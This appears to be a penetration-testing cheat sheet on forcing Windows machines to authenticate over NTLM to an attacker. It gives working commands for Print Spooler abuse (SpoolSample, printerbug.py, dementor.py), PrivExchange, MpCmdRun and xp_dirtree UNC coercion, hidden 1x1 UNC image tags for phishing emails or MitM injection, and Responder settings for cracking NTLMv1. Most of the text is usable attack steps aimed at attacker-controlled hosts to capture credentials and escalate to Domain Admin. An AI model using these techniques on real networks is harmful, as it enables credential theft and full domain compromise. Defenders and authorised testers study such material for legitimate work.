Force NTLM Privileged Authentication
SharpSystemTriggers is a collection of remote authentication triggers coded in C# using MIDL compiler for avoiding 3rd party dependencies.
If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controller’s print server an update on new print jobs and just tell it to send the notification to some system.
Note when printer send the notification to an arbitrary systems, it needs to authenticate against that system. Therefore, an attacker can make the Print Spooler service authenticate against an arbitrary system, and the service will use the computer account in this authentication.
Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
Using a slightly modified @mysmartlogin's (Vincent Le Toux's) SpoolerScanner, see if the Spooler Service is listening:
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
rpcdump.py DOMAIN/USER:[email protected] | grep MS-RPRN
SpoolSample.exe <TARGET> <RESPONDERIP>
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
If an attacker has already compromised a computer with Unconstrained Delegation, the attacker could make the printer authenticate against this computer. Due to the unconstrained delegation, the TGT of the computer account of the printer will be saved in the memory of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to retrieve this ticket and abuse it (Pass the Ticket).
The
PrivExchange attack results from a flaw in the Exchange Server PushSubscription feature, which allows any domain user with a mailbox to force the Exchange server to authenticate to any host provided by the client over HTTP.The Exchange service runs as SYSTEM and is over-privileged by default (i.e., has WriteDacl privileges on the domain pre-2019 Cumulative Update). This flaw can be leveraged to relay to LDAP and dump the domain NTDS database. If we cannot relay to LDAP, this can be leveraged to relay and authenticate to other hosts within the domain. This attack will take you directly to Domain Admin with any authenticated domain user account.
If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
If you know the email address of the user that logs inside a machine you want to compromise, you could just send him an email with a 1x1 image such as
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
and when he opens it, he will try to authenticate.
If you can perform a MitM attack to a computer and inject HTML in a page he will visualize you could try injecting an image like the following in the page:
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
If you can capture NTLMv1 challenges read here how to crack them.
Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
Last modified 1mo ago